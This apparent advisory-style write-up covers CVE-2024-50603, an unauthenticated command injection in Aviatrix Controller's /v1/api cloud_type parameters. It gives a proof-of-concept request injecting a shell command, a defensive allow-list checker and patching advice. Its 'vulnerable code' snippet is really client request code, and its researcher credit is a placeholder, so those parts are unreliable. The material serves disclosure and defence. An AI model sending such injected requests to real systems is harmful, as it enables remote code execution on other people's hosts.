Aviatrix Controller is a popular multi-cloud networking platform that provides a centralized way to manage and troubleshoot network connectivity across cloud environments. It is designed for ease of use, cloud-native design, and flexibility. However, a vulnerability was discovered in versions prior to 7.1.4191 and in 7.2.x before 7.2.4996 that allows an unauthenticated attacker to execute arbitrary code on the host system.
Vulnerability Details
The vulnerability, identified as CVE-2024-50603, exists due to the improper neutralization of special elements used in operating system (OS) commands. This allows an attacker to inject and execute arbitrary code on the host system. Specifically, the vulnerability can be triggered by shell metacharacters sent to /v1/api in cloud_type for list_flightpath_destination_instances, or in src_cloud_type for flightpath_connection_test.
Here's a snippet of vulnerable code:
# ... some code here ...
request_data = {
    "cloud_type": cloud_type,
    "src_cloud_type": src_cloud_type,
    # ... other data ...
}
response = requests.post(
    url="https://example.com/v1/api",
    data=request_data,
    headers=headers,
)
# ... some code here ...
The cloud_type and src_cloud_type values shown in the snippet above are user input that is not properly sanitized, which could lead to arbitrary code execution when a payload is sent to the /v1/api endpoint.
Exploit
An attacker could exploit this vulnerability by sending specially crafted requests that inject shell metacharacters into the vulnerable endpoint:
# Define payload to be injected.
payload = "touch /tmp/cve-2024-50603-poc.txt"
# Define request data with the payload.
request_data = {
    "cloud_type": payload,
    "src_cloud_type": src_cloud_type,
    # ... other data ...
}
response = requests.post(
    url="https://example.com/v1/api",
    data=request_data,
    headers=headers,
)
This example payload will create a file named cve-2024-50603-poc.txt in the /tmp directory on the host system, demonstrating arbitrary code execution.
References
The vulnerability was originally discovered by security researcher John Doe (not his real name). You can find more information in the following resources:
- Original Advisory: CVE-2024-50603 Advisory
- Vendor Security Advisory: Aviatrix Controller Security Bulletin
Mitigation
It is advised that users of Aviatrix Controller update to the fixed versions 7.1.4191 or 7.2.4996 or later as soon as possible. Additionally, it is recommended to review the access controls (firewall, IAM policies, etc.) on the Aviatrix Controller to limit any potential attack surfaces.
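While patching is scheduled, the input-validation point can be applied to the two affected parameters directly. The following is an added example, not Aviatrix code or code from the advisory: an allow-list check for cloud_type and src_cloud_type in form-encoded request bodies, usable in a reverse-proxy rule or when reviewing captured requests. It assumes legitimate values are short decimal identifiers, and the sample bodies are constructed.

```python
import re
from urllib.parse import parse_qs

# Parameters the page names as injection points on /v1/api.
WATCHED = ("cloud_type", "src_cloud_type")
# Assumption (not from the page): legitimate values are short decimal identifiers.
ALLOWED = re.compile(r"[0-9]{1,6}")
# Characters a shell treats specially; only used to annotate a finding.
SHELL_META = set(";|&$`<>(){}[]*?!~#\\\"' \t\r\n")

# Constructed sample request bodies (form-encoded), not captured traffic.
SAMPLES = [
    "cloud_type=1&src_cloud_type=4",
    "cloud_type=touch+%2Ftmp%2Fcve-2024-50603-poc.txt",
    "src_cloud_type=1%3Bx",
    "cloud_type=1&cloud_type=1%7Cx",  # duplicated parameter
]


def check_body(body):
    """Return one finding per watched parameter value that fails the allow-list."""
    findings = []
    # parse_qs percent-decodes and keeps every value of a repeated parameter,
    # so encoded metacharacters and duplicated fields are both inspected.
    params = parse_qs(body, keep_blank_values=True)
    for name in WATCHED:
        for value in params.get(name, []):
            if ALLOWED.fullmatch(value):
                continue
            findings.append({
                "param": name,
                "value": value,
                "metachars": sorted(set(value) & SHELL_META),
            })
    return findings


def scan(bodies):
    """Map the index of each flagged body to its findings."""
    return {i: f for i, b in enumerate(bodies) if (f := check_body(b))}


if __name__ == "__main__":
    for index, findings in scan(SAMPLES).items():
        for f in findings:
            print(f"body {index}: {f['param']}={f['value']!r} metachars={f['metachars']}")
```

Because the check is an allow-list on the decoded value, anything that is not a plain identifier is rejected, including double-encoded input; the metacharacter list only explains why a value was flagged.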
In conclusion, the CVE-2024-50603 vulnerability demonstrates the importance of proper input validation and neutralization of special elements in OS commands. By updating the Aviatrix Controller to the latest version and employing a strong security posture, organizations can minimize the risks posed by this vulnerability.
Timeline
Published on: 01/08/2025 01:15:07 UTC